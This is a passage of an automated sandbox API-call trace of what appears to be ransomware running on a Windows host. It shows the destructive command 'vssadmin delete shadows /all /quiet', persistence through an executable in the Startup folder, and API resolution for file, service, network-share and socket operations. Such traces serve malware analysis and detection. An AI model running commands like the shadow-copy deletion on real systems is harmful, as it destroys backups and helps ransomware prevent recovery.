lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x202efdeff0*="system32") returned 0x13 [0308.818] SetErrorMode (uMode=0x0) returned 0x1 [0308.818] GetProcessHeap () returned 0x1b843bf0000 [0308.818] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, Ptr=0x1b843c0aac0, Size=0x4a) returned 0x1b843c0aac0 [0308.818] GetProcessHeap () returned 0x1b843bf0000 [0308.818] RtlSizeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, MemoryPointer=0x1b843c0aac0) returned 0x4a [0308.818] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps;") returned 0xbc [0308.818] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0308.818] GetProcessHeap () returned 0x1b843bf0000 [0308.818] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x1b6) returned 0x1b843bf7830 [0308.818] GetProcessHeap () returned 0x1b843bf0000 [0308.818] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x35c) returned 0x1b843c08e80 [0308.818] GetProcessHeap () returned 0x1b843bf0000 [0308.818] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, Ptr=0x1b843c08e80, Size=0x1b8) returned 0x1b843c08e80 [0308.818] GetProcessHeap () returned 0x1b843bf0000 [0308.818] RtlSizeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, MemoryPointer=0x1b843c08e80) returned 0x1b8 [0308.818] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0308.819] GetProcessHeap () returned 0x1b843bf0000 [0308.819] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xe8) returned 0x1b843c09050 [0308.819] GetProcessHeap () returned 0x1b843bf0000 [0308.819] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, Ptr=0x1b843c09050, Size=0x7e) returned 0x1b843c09050 [0308.819] GetProcessHeap () returned 0x1b843bf0000 [0308.819] RtlSizeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, MemoryPointer=0x1b843c09050) returned 0x7e [0308.819] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0308.819] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x202efded60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x202efded60) returned 0x1b843c090e0 [0308.819] FindClose (in: hFindFile=0x1b843c090e0 | out: hFindFile=0x1b843c090e0) returned 1 [0308.820] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x202efded60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x202efded60) returned 0xffffffffffffffff [0308.820] GetLastError () returned 0x2 [0308.820] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x202efded60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x202efded60) returned 0x1b843c090e0 [0308.820] FindClose (in: hFindFile=0x1b843c090e0 | out: hFindFile=0x1b843c090e0) returned 1 [0308.820] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0308.820] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0308.820] ??_V@YAXPEAX@Z () returned 0x1 [0308.820] GetConsoleTitleW (in: lpConsoleTitle=0x202efdf2e0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0309.267] GetProcessHeap () returned 0x1b843bf0000 [0309.267] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x21c) returned 0x1b843bf15f0 [0309.267] GetConsoleTitleW (in: lpConsoleTitle=0x1b843bf1600, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0309.483] GetProcessHeap () returned 0x1b843bf0000 [0309.483] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, Ptr=0x1b843bf15f0, Size=0xa4) returned 0x1b843bf15f0 [0309.483] GetProcessHeap () returned 0x1b843bf0000 [0309.484] RtlSizeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, MemoryPointer=0x1b843bf15f0) returned 0xa4 [0309.484] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0309.676] GetProcessHeap () returned 0x1b843bf0000 [0309.676] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf15f0) returned 1 [0309.676] InitializeProcThreadAttributeList (in: lpAttributeList=0x202efdf200, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x202efdf0f0 | out: lpAttributeList=0x202efdf200, lpSize=0x202efdf0f0) returned 1 [0309.676] UpdateProcThreadAttribute (in: lpAttributeList=0x202efdf200, dwFlags=0x0, Attribute=0x60001, lpValue=0x202efdf0dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x202efdf200, lpPreviousValue=0x0) returned 1 [0309.676] GetStartupInfoW (in: lpStartupInfo=0x202efdf190 | out: lpStartupInfo=0x202efdf190*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0309.676] GetProcessHeap () returned 0x1b843bf0000 [0309.676] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x20) returned 0x1b843bf7630 [0309.677] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0309.677] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0309.677] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0309.677] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0309.677] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0309.677] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0309.677] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0309.677] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0309.678] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0309.679] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0309.680] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0309.680] GetProcessHeap () returned 0x1b843bf0000 [0309.680] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf7630) returned 1 [0309.680] GetProcessHeap () returned 0x1b843bf0000 [0309.680] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x12) returned 0x1b843bf79f0 [0309.681] _get_osfhandle (_FileHandle=1) returned 0x254 [0309.681] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0309.681] _get_osfhandle (_FileHandle=0) returned 0x248 [0309.681] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0309.681] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x202efdf120*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x202efdf0f8 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x202efdf0f8*(hProcess=0x98, hThread=0x9c, dwProcessId=0xeb0, dwThreadId=0xeb4)) returned 1 [0310.430] CloseHandle (hObject=0x9c) returned 1 [0310.430] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0310.430] GetProcessHeap () returned 0x1b843bf0000 [0310.430] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843c09f90) returned 1 [0310.430] GetEnvironmentStringsW () returned 0x1b843c09460* [0310.431] GetProcessHeap () returned 0x1b843bf0000 [0310.431] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xb24) returned 0x1b843c09f90 [0310.431] FreeEnvironmentStringsA (penv="=") returned 1 [0310.431] NtQueryInformationProcess (in: ProcessHandle=0x98, ProcessInformationClass=0x0, ProcessInformation=0x202efde5f8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x202efde5f8, ReturnLength=0x0) returned 0x0 [0310.431] ReadProcessMemory (in: hProcess=0x98, lpBaseAddress=0x6a8ae05000, lpBuffer=0x202efde630, nSize=0x7a0, lpNumberOfBytesRead=0x202efde5f0 | out: lpBuffer=0x202efde630*, lpNumberOfBytesRead=0x202efde5f0*=0x7a0) returned 1 [0310.431] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) Thread: id = 57 os_tid = 0xe54 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3a0cc000" os_pid = "0xe10" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xddc" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001684b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0xe14 Thread: id = 51 os_tid = 0xe30 Thread: id = 52 os_tid = 0xe3c Thread: id = 53 os_tid = 0xe40 Thread: id = 54 os_tid = 0xe44 Process: id = "8" image_name = "wdgmug.exe" filename = "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\wdgmug.exe" page_root = "0x33b4f000" os_pid = "0xe58" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0xa24" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\wdgmug.exe\" " cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001684b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 58 os_tid = 0xe5c [0290.261] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77a50000 [0290.261] GetProcAddress (hModule=0x77a50000, lpProcName="GetProcAddress") returned 0x77a651b0 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetModuleHandleW") returned 0x77a650d0 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="FindNextFileW") returned 0x77abee40 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="FindClose") returned 0x77abed70 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="MoveFileW") returned 0x77a9e500 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetFileSizeEx") returned 0x77abef40 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetModuleFileNameW") returned 0x77a65090 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetFileAttributesW") returned 0x77abef10 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="ExitProcess") returned 0x77a63cb0 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetCommandLineW") returned 0x77a64cc0 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetComputerNameW") returned 0x77a932c0 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetComputerNameA") returned 0x77a93780 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="CreateMutexW") returned 0x77abeb70 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="lstrlenW") returned 0x77a66c70 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="lstrlenA") returned 0x77a66c50 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetCurrentProcess") returned 0x77abea10 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="WaitForSingleObject") returned 0x77abeca0 [0290.262] GetProcAddress (hModule=0x77a50000, lpProcName="GetLogicalDrives") returned 0x77a60d20 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="GetTickCount") returned 0x77abdd50 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="DeleteFileW") returned 0x77abed40 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="WideCharToMultiByte") returned 0x77a66b10 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77abebb0 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="Sleep") returned 0x77a66760 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="LeaveCriticalSection") returned 0x77b6b250 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="ReadFile") returned 0x77abf090 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="CreateFileW") returned 0x77abed10 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="OpenMutexW") returned 0x77abebf0 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="EnterCriticalSection") returned 0x77b6b2d0 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="WaitForMultipleObjects") returned 0x77abec80 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="lstrcmpiW") returned 0x77a66bf0 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="lstrcmpiA") returned 0x77a66bd0 [0290.263] GetProcAddress (hModule=0x77a50000, lpProcName="DeleteCriticalSection") returned 0x77b4fb90 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="ReleaseMutex") returned 0x77abec20 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="CloseHandle") returned 0x77abeab0 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="GetVersion") returned 0x77a656c0 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="CreateThread") returned 0x77a646b0 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="ExpandEnvironmentStringsW") returned 0x77a64a40 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="QueryPerformanceCounter") returned 0x77a65da0 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="QueryPerformanceFrequency") returned 0x77a65dc0 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="GetCurrentProcessId") returned 0x77abea20 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="SetFileAttributesW") returned 0x77abf100 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="GetVolumeInformationW") returned 0x77abf020 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="WriteFile") returned 0x77abf180 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="SetFilePointerEx") returned 0x77abf130 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="SetEndOfFile") returned 0x77abf0e0 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="FindFirstFileW") returned 0x77abedf0 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="GetProcessHeap") returned 0x77a651f0 [0290.264] GetProcAddress (hModule=0x77a50000, lpProcName="HeapReAlloc") returned 0x77b5f630 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="HeapAlloc") returned 0x77b62dc0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="HeapFree") returned 0x77a657f0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="CreatePipe") returned 0x77a64590 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="SetHandleInformation") returned 0x77abeae0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="CreateProcessW") returned 0x77a64610 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="CompareStringW") returned 0x77a64430 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="CompareStringA") returned 0x77a64410 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="OpenProcess") returned 0x77a65cc0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="TerminateProcess") returned 0x77a667e0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="GetSystemTime") returned 0x77a654e0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="SystemTimeToFileTime") returned 0x77a667a0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="GetLastError") returned 0x77a65010 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="CreateToolhelp32Snapshot") returned 0x77a9edc0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="Process32NextW") returned 0x77a9f8f0 [0290.265] GetProcAddress (hModule=0x77a50000, lpProcName="Process32FirstW") returned 0x77a9f750 [0290.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77510000 [0290.804] GetProcAddress (hModule=0x77510000, lpProcName="RegOpenKeyExW") returned 0x7752e580 [0290.804] GetProcAddress (hModule=0x77510000, lpProcName="RegQueryValueExW") returned 0x7752e5a0 [0290.804] GetProcAddress (hModule=0x77510000, lpProcName="RegSetValueExW") returned 0x7752f530 [0290.804] GetProcAddress (hModule=0x77510000, lpProcName="RegCloseKey") returned 0x7752ed60 [0290.804] GetProcAddress (hModule=0x77510000, lpProcName="OpenProcessToken") returned 0x7752efb0 [0290.805] GetProcAddress (hModule=0x77510000, lpProcName="GetTokenInformation") returned 0x7752ee90 [0290.805] GetProcAddress (hModule=0x77510000, lpProcName="OpenSCManagerW") returned 0x77530540 [0290.805] GetProcAddress (hModule=0x77510000, lpProcName="OpenServiceW") returned 0x7752fa20 [0290.805] GetProcAddress (hModule=0x77510000, lpProcName="CloseServiceHandle") returned 0x7752fc00 [0290.805] GetProcAddress (hModule=0x77510000, lpProcName="ControlService") returned 0x775426d0 [0290.805] GetProcAddress (hModule=0x77510000, lpProcName="QueryServiceStatus") returned 0x77532380 [0290.805] GetProcAddress (hModule=0x77510000, lpProcName="EnumDependentServicesW") returned 0x77542f70 [0290.805] GetProcAddress (hModule=0x77510000, lpProcName="EnumServicesStatusExW") returned 0x7752fc80 [0290.805] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75450000 [0291.221] GetProcAddress (hModule=0x75450000, lpProcName="SystemParametersInfoW") returned 0x7547f210 [0291.221] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x761c0000 [0291.717] GetProcAddress (hModule=0x761c0000, lpProcName="ShellExecuteExW") returned 0x76324730 [0291.717] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77b20000 [0291.718] GetProcAddress (hModule=0x77b20000, lpProcName="NtQuerySystemInformation") returned 0x77b92070 [0291.718] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74520000 [0291.722] GetProcAddress (hModule=0x74520000, lpProcName="WNetCloseEnum") returned 0x74522640 [0291.722] GetProcAddress (hModule=0x74520000, lpProcName="WNetOpenEnumW") returned 0x74522790 [0291.722] GetProcAddress (hModule=0x74520000, lpProcName="WNetEnumResourceW") returned 0x74522410 [0291.722] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x779d0000 [0291.727] GetProcAddress (hModule=0x779d0000, lpProcName="WSAStartup") returned 0x779d5b40 [0291.727] GetProcAddress (hModule=0x779d0000, lpProcName="socket") returned 0x779e4510 [0291.727] GetProcAddress (hModule=0x779d0000, lpProcName="send") returned 0x779d5030 [0291.727] GetProcAddress (hModule=0x779d0000, lpProcName="recv") returned 0x779e0c50 [0291.727] GetProcAddress (hModule=0x779d0000, lpProcName="connect") returned 0x779d5410 [0291.727] GetProcAddress (hModule=0x779d0000, lpProcName="closesocket") returned 0x779e0910 [0291.728] GetProcAddress (hModule=0x779d0000, lpProcName="gethostbyname") returned 0x77a06cb0 [0291.728] GetProcAddress (hModule=0x779d0000, lpProcName="inet_addr") returned 0x779e9160 [0291.728] GetProcAddress (hModule=0x779d0000, lpProcName="ntohl") returned 0x779d49d0 [0291.728] GetProcAddress (hModule=0x779d0000, lpProcName="htonl") returned 0x779d49d0 [0291.728] GetProcAddress (hModule=0x779d0000, lpProcName="htons") returned 0x779e8ff0 [0291.728] GetProcessHeap () returned 0x750000 [0291.728] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x75afd0 [0291.728] QueryPerformanceCounter (in: lpPerformanceCount=0x19fdb0 | out: lpPerformanceCount=0x19fdb0*=9619014218) returned 1 [0291.728] GetTickCount () returned 0x114201c [0291.728] GetCurrentProcessId () returned 0xe58 [0292.006] GetTickCount () returned 0x1142125 [0292.007] GetTickCount () returned 0x1142125 [0292.007] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x75b188 [0292.007] GetVersion () returned 0x23f00206 [0292.007] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7) returned 0x767030 [0292.007] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x7680d0 [0292.007] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x7680d0, Size=0x20) returned 0x75ae90 [0292.007] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x75ae90, Size=0x40) returned 0x767940 [0292.007] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xfffe) returned 0x76d6b0 [0292.008] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_2KXQ81A") returned 0x1ec [0292.008] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x767030 | out: hHeap=0x750000) returned 1 [0292.008] lstrlenW (lpString="Global\\syncronize_") returned 18 [0292.008] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x767940 | out: hHeap=0x750000) returned 1 [0292.008] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7) returned 0x766fc0 [0292.009] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x10) returned 0x767ff8 [0292.009] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x767ff8, Size=0x20) returned 0x75ae90 [0292.009] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x75ae90, Size=0x40) returned 0x7675e0 [0292.009] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xfffe) returned 0x77d6b8 [0292.009] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_2KXQ81U") returned 0x1f0 [0292.009] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x766fc0 | out: hHeap=0x750000) returned 1 [0292.010] lstrlenW (lpString="Global\\syncronize_") returned 18 [0292.010] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7675e0 | out: hHeap=0x750000) returned 1 [0292.010] GetVersion () returned 0x23f00206 [0292.010] GetCurrentProcess () returned 0xffffffff [0292.010] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fd9c | out: TokenHandle=0x19fd9c*=0x1f4) returned 1 [0292.010] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x14, TokenInformation=0x19fd98, TokenInformationLength=0x4, ReturnLength=0x19fda4 | out: TokenInformation=0x19fd98, ReturnLength=0x19fda4) returned 1 [0292.010] CloseHandle (hObject=0x1f4) returned 1 [0292.010] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x0) returned 0x102 [0292.010] ExitProcess (uExitCode=0x0) Thread: id = 59 os_tid = 0xe68 Process: id = "9" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x38cbf000" os_pid = "0xe70" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xddc" cmd_line = "mode con cp select=1251" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], 